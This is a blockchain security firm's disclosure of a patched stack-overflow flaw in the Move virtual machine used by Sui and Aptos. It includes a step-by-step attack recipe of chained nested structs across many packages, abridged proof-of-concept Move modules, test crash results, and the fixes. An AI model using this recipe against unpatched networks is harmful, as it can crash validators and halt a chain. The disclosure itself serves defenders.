June 26, 2023

Critical vulnerability in Move VM: Sui, Aptos and other public chains at risk of crash and hard fork


Background

Move is a new blockchain programming language used by platforms such as Aptos and Sui. The Beosin security research team recently discovered a stack overflow vulnerability in the Move virtual machine caused by unbounded recursive calls. This vulnerability can lead to a total network shutdown, prevent new validators from joining the network, and potentially result in a hard fork.


Upon discovering and verifying this vulnerability, we immediately (on May 30, 2023) contacted the Sui team via email. Following their advice, we submitted the vulnerability to the Immunefi bug bounty platform on June 2, 2023. However, the Sui team responded that they had identified the issue internally a month earlier and had been working on a private security fix. They released the fix on the same day we submitted our report to Immunefi (June 2, 2023). We understand and respect their response.



The vulnerability has been fixed in the current version, so we are now publicly disclosing our research findings.


Knowledge Basics

The Move virtual machine is implemented in the Rust programming language. The main unit of organization and distribution of Move code is a Package. A Package consists of a set of modules, which are defined in separate files with the extension .move. These files include Move functions and type definitions.


The minimum package directory structure is shown below, which includes a manifest file, a lock file, and a sources subdirectory containing one or more module files.

my_move_package
    ├── Move.lock
    ├── Move.toml
    └── sources
        └── my_module.move


Packages can be published on the blockchain. A Package can contain multiple Modules, and a Module can contain multiple functions and structs.


Function parameters can be structs, and structs can be nested within other structs, as shown below:

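module helloworld::hello {
    struct CCC has drop {
        c: u64
    }

    // A struct can only be constructed inside the module that defines it,
    // so other modules need a public constructor.
    public fun new(c: u64): CCC {
        CCC { c }
    }
}

module my_module::my_module {
    struct BBB has drop {
        b: helloworld::hello::CCC
    }

    struct AAA has drop {
        a: BBB
    }

    // A struct type used as a function parameter.
    public fun mint(c_param: helloworld::hello::CCC) {
        // AAA nests BBB, which nests CCC from another module.
        let _a1 = AAA {
            a: BBB {
                b: c_param
            }
        };

        let _a2 = AAA {
            a: BBB {
                b: helloworld::hello::new(0x555)
            }
        };
    }
}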


In Rust, recursive function calls with no limit on call depth can overflow the stack or exhaust CPU and memory resources. Because the Move virtual machine is implemented in Rust, it is exposed to the same risk.
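To make the risk concrete, here is a minimal Rust sketch. It is not taken from the Move VM source: the `Ty` enum, the `MAX_DEPTH` constant, and both functions are hypothetical names chosen for illustration. It shows a recursive walk over a nested type that returns an error once a depth budget is exceeded, rather than recursing until the stack is exhausted.

```rust
/// Hypothetical, simplified model of a nested type (not the Move VM's own type).
#[derive(Debug)]
pub enum Ty {
    U64,
    Vector(Box<Ty>),
    /// A struct, represented only by the types of its fields.
    Struct(Vec<Ty>),
}

/// Illustrative limit; the limits used by a real VM may differ.
pub const MAX_DEPTH: usize = 256;

/// Returns the nesting depth of `ty`, or an error once `MAX_DEPTH` is exceeded.
/// Every recursive call uses a stack frame, so bounding `depth` bounds stack use.
pub fn checked_depth(ty: &Ty, depth: usize) -> Result<usize, String> {
    if depth > MAX_DEPTH {
        return Err(format!("type nesting exceeds {} levels", MAX_DEPTH));
    }
    match ty {
        Ty::U64 => Ok(depth),
        Ty::Vector(inner) => checked_depth(inner, depth + 1),
        Ty::Struct(fields) => {
            let mut deepest = depth;
            for field in fields {
                deepest = deepest.max(checked_depth(field, depth + 1)?);
            }
            Ok(deepest)
        }
    }
}

/// Builds a chain of `levels` single-field structs wrapped around a `u64`.
pub fn nested_struct(levels: usize) -> Ty {
    let mut ty = Ty::U64;
    for _ in 0..levels {
        ty = Ty::Struct(vec![ty]);
    }
    ty
}
```

Under these assumptions, `checked_depth(&nested_struct(3), 0)` returns `Ok(3)`, while a 1,000-level chain produces an error at the limit instead of continuing to recurse.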


Vulnerability Description

Within the Move virtual machine, recursive functions are frequently used to handle various structured data, such as serialized data, nested structs, nested arrays, and generic nesting. To prevent stack overflow caused by recursive calls, it is necessary to check the depth of recursive calls.



[Figure: the Move virtual machine limits the parsing depth of simple and complex type structures.]


[Figure: the depth limit on SIGNATURE_TOKEN within the Move virtual machine bytecode.]

Although the Move virtual machine has recursive call depth checks in many places, there are still certain cases that have not been taken into account.


Let’s consider an attack scenario: defining a struct A, then nesting struct B within A, and nesting struct C within B, and so on, continuing the nesting indefinitely. If the Move virtual machine uses a recursive function to handle this nesting relationship, it will crash due to stack overflow or insufficient resources. Although Move has limitations on the number of structs that can be defined within each module, we can create an unlimited number of modules.


This gives us an attack strategy:

1. Generate 25 packages (can be more than 25), each containing 1 module.

2. Each module defines 64 structs (can be more than 64 in Aptos) with a chained nesting relationship. The first struct in each module nests the last struct from the previous module.

3. Each module includes a callable entry function. This function takes a parameter of the type of the last struct (the 64th struct) from the previous module. The function creates and returns an instance of the last struct in the current module.

4. Publish each package in order.

5. Call the entry function in each module in order.
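The arithmetic behind this strategy can be sketched as follows. This is a hypothetical Rust model, not VM code: `StructId`, `build_chain`, and `nesting_depth` are names invented for illustration. It shows that a cap of 64 structs per module still allows a chain of 25 × 64 = 1,600 nesting levels once the modules are linked together.

```rust
use std::collections::HashMap;

/// Hypothetical identifier for a struct: (module index, struct index).
pub type StructId = (usize, usize);

/// Builds the "wraps" relation from the steps above: each struct wraps the
/// previous struct in its module, and the first struct of each module wraps
/// the last struct of the previous module. The very first struct wraps nothing.
pub fn build_chain(
    modules: usize,
    structs_per_module: usize,
) -> HashMap<StructId, Option<StructId>> {
    let mut wraps = HashMap::new();
    for m in 0..modules {
        for s in 0..structs_per_module {
            let inner = if s > 0 {
                Some((m, s - 1))
            } else if m > 0 {
                Some((m - 1, structs_per_module - 1))
            } else {
                None
            };
            wraps.insert((m, s), inner);
        }
    }
    wraps
}

/// Follows the chain from `start` with a loop (no recursion) and counts levels.
pub fn nesting_depth(wraps: &HashMap<StructId, Option<StructId>>, start: StructId) -> usize {
    let mut depth = 1;
    let mut current = start;
    while let Some(Some(inner)) = wraps.get(&current) {
        depth += 1;
        current = *inner;
    }
    depth
}
```

In this model, the last struct of the first module sits 64 levels deep, and the last struct of the 25th module sits 1,600 levels deep. A per-module limit on struct count therefore does not bound the total nesting depth; only a check on the depth itself does.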


During our testing on Sui mainnet_v1.1.1, we observed the following phenomena in our test environment with 4 validators:

1. After running the PoC once, all 4 validators immediately crash due to stack overflow.

2. After at least 3 validators crash and restart, all full nodes crash.

3. After at least 3 validators crash and restart, new validators joining the network crash at least once.

4. After at least 3 validators crash and restart, new full nodes joining the network sometimes crash once.

5. In some cases, validators or full nodes cannot be restarted after a crash unless all local databases are deleted.


Regarding Sui mainnet_v1.2.0, we observed the following phenomena in our test environment with 4 validators:

1. After running the PoC once, at least 1 validator crashes due to stack overflow or memory exhaustion.

2. Running the PoC again can make the second validator crash. After that, the entire network cannot accept new transactions.

3. Crashed validators may be unable to restart. If all local databases of a crashed validator are deleted and the validator is started again, it crashes after some time and can no longer be restarted.

4. When a new validator joins the network, it crashes.


We conducted a simple test on Aptos and found that Aptos also crashes.


PoC

Sui PoC

module hello_world_2::hello{
    use std::string;
    use sui::object::{Self, UID};
    use sui::transfer;
    use sui::tx_context::{Self, TxContext};

    struct T_0 has key,store{
        id : UID,
        m : hello_world_1::hello::T_63
    }

    struct T_1 has key,store{
        id : UID,
        m : T_0
    }

    ........other not printed.........

    struct T_62 has key,store{
        id : UID,
        m : T_61
    }

    struct T_63 has key,store{
        id : UID,
        m : T_62
    }

    public entry fun mint(previous: hello_world_1::hello::T_63 ,ctx: &mut TxContext) {
        let object = T_63{
            id: object::new(ctx),
            m : T_62{
                id: object::new(ctx),
                m : T_61{
                    id: object::new(ctx),

                    ........other not printed.........

                    m : T_1{
                        id: object::new(ctx),
                        m : T_0{
                            id: object::new(ctx),
m : previous}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}};

        transfer::transfer(object, tx_context::sender(ctx));
    }
}


Each generated module is published to the Sui chain, and its “mint” function is called to obtain the created “object”. That “object” is then passed as the parameter to the “mint” function of the next module, and the process repeats until the Sui node crashes.


Aptos PoC

Each generated module is published to the Aptos chain, and its “mint” function is called, until the Aptos node crashes.

module Test2::test_module2{
    struct Struct0 has key,store,drop {
        m : Test1::test_module1::Struct200
    }

    struct Struct1 has key,store,drop{
        m : Struct0
    }

    ........other not printed.........

    struct Struct199 has key,store,drop{
        m : Struct198
    }

    struct Struct200 has key,store,drop{
        m : Struct199
    }

    public entry fun mint(_account : signer){
        let previous0 = 5554444;
        let previous1 = Test0::test_module0::test_function(previous0);
        let previous2 = Test1::test_module1::test_function(previous1);
        let _current = test_function(previous2);
    }

    public fun test_function(previous : Test1::test_module1::Struct200) : Struct200{
        let object = Struct200{
            m:Struct199{

                ........other not printed.........

                m:Struct1{
                    m:Struct0{
m:previous}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}};

        object
    }
}


Vulnerability Fix

Sui mainnet_v1.2.1 (June 2, 2023), Aptos mainnet_v1.4.3 (June 3, 2023), and Move-language versions released after June 10, 2023 have addressed this vulnerability.


Sui patch:

https://github.com/MystenLabs/sui/commit/8b681515c0cf435df2a54198a28ab4ef574d202b

The patch code imposes limitations on the depth of type references in the creation of structs, vectors, and generics. The key function added is “check_depth_of_type.”


Aptos patch:

https://github.com/aptos-labs/aptos-core/commit/47a0391c612407fe0b1051ef658a29e35d986963

Similar to Sui, the patch code also imposes limitations on the depth of type references in the creation of structs, vectors, and generics. The key function added is “check_depth_of_type.”


Move-language patch:

https://github.com/move-language/move/commit/8f5303a365cf9da7554f8f18c393b3d6eb4867f2

Similar to Sui and Aptos, the patch code also imposes limitations on the depth of type references in the creation of structs, vectors, and generics. The key function added is “check_depth_of_type.”
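The idea behind such a depth check can be sketched as follows. This is a simplified illustration in Rust, not the code from any of the three patches: the `Type` enum, the `StructDefs` table, the `chain_defs` helper, and the limit passed as `max_depth` are all assumptions, and only the name `check_depth_of_type` is borrowed from the patches.

```rust
use std::collections::HashMap;

/// Simplified stand-in for a runtime type (hypothetical, for illustration only).
pub enum Type {
    U64,
    Vector(Box<Type>),
    /// A struct referenced by name, with generic type arguments.
    Struct { name: String, ty_args: Vec<Type> },
}

/// Struct name -> field types; stands in for definitions loaded from published modules.
pub type StructDefs = HashMap<String, Vec<Type>>;

/// Rejects `ty` if it nests types more than `max_depth` levels deep.
/// `depth` is the number of levels already consumed by enclosing types.
pub fn check_depth_of_type(
    defs: &StructDefs,
    ty: &Type,
    depth: usize,
    max_depth: usize,
) -> Result<(), String> {
    if depth > max_depth {
        return Err(format!("type depth {} exceeds limit {}", depth, max_depth));
    }
    match ty {
        Type::U64 => Ok(()),
        Type::Vector(elem) => check_depth_of_type(defs, elem, depth + 1, max_depth),
        Type::Struct { name, ty_args } => {
            // Generic arguments and declared fields each add one level of nesting.
            for arg in ty_args {
                check_depth_of_type(defs, arg, depth + 1, max_depth)?;
            }
            let fields = defs
                .get(name)
                .ok_or_else(|| format!("unknown struct {}", name))?;
            for field in fields {
                check_depth_of_type(defs, field, depth + 1, max_depth)?;
            }
            Ok(())
        }
    }
}

/// Builds `n` structs S0..S{n-1}: S0 holds a u64 and each S{i} wraps S{i-1}.
pub fn chain_defs(n: usize) -> StructDefs {
    let mut defs = StructDefs::new();
    for i in 0..n {
        let field = if i == 0 {
            Type::U64
        } else {
            Type::Struct { name: format!("S{}", i - 1), ty_args: vec![] }
        };
        defs.insert(format!("S{}", i), vec![field]);
    }
    defs
}
```

With an assumed limit of 128, a 10-level chain passes the check, while the top of a chain of 1,600 structs (25 modules of 64 structs each) is rejected after 129 recursive steps. Because the check fails as soon as the budget is spent, the recursion inside the check is itself bounded.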


Vulnerability Impact

Exploiting this vulnerability is simple and consumes very little gas per attack. However, its impact is significant: it can lead to a total network shutdown, prevent new validator nodes from joining the network, and potentially cause a hard fork. This vulnerability affects Sui mainnet versions prior to v1.2.1, Aptos mainnet versions prior to v1.4.3, and Move-language versions prior to June 10, 2023.


Why can this vulnerability potentially cause a hard fork?

1. Malicious attackers can create struct nesting relationships of arbitrary depth and deploy these malicious structs on the blockchain. They can then send immutable malicious transactions targeting these structs. Although this process may cause network crashes, some malicious transactions will still be deployed on the chain.

2. To patch this vulnerability, we can limit the depth of recursive calls. However, this means that we can no longer reference the malicious structs already deployed on the blockchain and cannot verify historical transactions related to these malicious structs within the virtual machine. Only a hard fork can resolve this issue.

3. Because testing a hard fork would severely affect the live network, we did not carry out that test. In theory, however, we believe the scenario is feasible.


Summary

A simple recursive function call leading to a stack overflow can cause a total network shutdown, and with additional manipulation, it may even result in a hard fork. The security of the blockchain should therefore always be the top priority. We recommend that project teams pay close attention to such vulnerabilities and consider engaging professional blockchain security organizations for comprehensive audits.



